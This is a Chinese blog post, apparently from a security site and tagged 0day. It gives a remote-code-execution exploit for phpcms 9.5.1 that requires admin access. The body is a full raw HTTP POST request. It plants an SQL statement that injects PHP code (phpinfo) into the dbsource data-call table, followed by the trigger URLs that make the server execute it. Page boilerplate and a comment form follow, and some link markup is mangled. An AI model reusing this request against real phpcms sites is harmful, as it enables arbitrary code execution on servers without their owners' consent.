phpcms 9.5.1 index.php 远程代码执行漏洞(利用工具)



只允许会员下载 该文件只允许会员下载! 登录 | 注册
更多工具在: isafe.cc" target="_blank">isafe.cc/">http://www.isafe.cc" target="_blank">isafe.cc/
web墙:      isafe.cc" target="_blank">isafe.cc/">http://waf.isafe.cc" target="_blank">isafe.cc/
漏洞利用前提: 有phpcms后台权限

isafe.cc" target="_blank">isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=admin" target="_blank">http://phpcms.isafe.cc" target="_blank">isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=admin&c=index
提交以上连接进入后台,点击“模块”

添加数据源
POST /phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=add HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: isafe.cc" target="_blank">isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=dbsource" target="_blank">isafe.cc" target="_blank">isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=dbsource" target="_blank">http://phpcms.isafe.cc" target="_blank">isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=add&pc_hash=h6Po4O&type=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: phpcms.isafe.cc" target="_blank">isafe.cc:2217
Content-Length: 316
Connection: Keep-Alive
Cookie: ZGdwR_admin_username=e17cVgcDAAVUAQMEVAEJAgACAF9UVwJRWQFQClZIDkgFCxU; ZGdwR_siteid=9de4BANRAgYICVYBVgVXWFBfC1QHBloHBA0IBgMG; ZGdwR_userid=798fCQdTAwQABlEHBwhQAFRbBgpQVwlQAlcCVVdU; ZGdwR_admin_email=798fCQdTAwQABlEHB1wFAFZSBloCUlQHVlMLXAcEUAsKXCVQRAJVUR5VAg; ZGdwR_sys_lang=07eaAQVTUQMFCAkHVlVXBV5VVAUMAgtWUgMNVQFIDUxQWg; PHPSESSID=hqgaqdbvncrsqbr3hr6b6uq8g0

type=1&data=update+v9_datacall+set+module%3D%27announce%27%2Caction%3D%27pc_tag%27%2Cdata%3D%27phpinfo%28%29%3B%27%2Ctype%3D%272%27+where+name%3D123%3B&name=123456&dis_type=1&template=%7Bloop+%24data+%24k+%24v%7D%0D%0A++++%3C%21--+%C4%E3%B5%C4%B4%FA%C2%EB+--%3E%0D%0A%7B%2Floop%7D&cache=&num=&dosubmit=&pc_hash=h6Po4O
数据源列表
isafe.cc" target="_blank">isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=dbsource" target="_blank">http://phpcms.isafe.cc" target="_blank">isafe.cc:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=data&a=init&menuid=902&pc_hash=h6Po4O

http://127.0.0.1:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=call&a=get&id=10

提交以上链接2次,执行就phpinfo() 函数了。
http://127.0.0.1:2217/phpcms_GBK_9.5.1/index.php?m=dbsource&c=call&a=get&id=38


[本日志由 admin 于 2014-03-11 01:10 PM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 0 | 引用: 0 | 查看次数: 4009
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭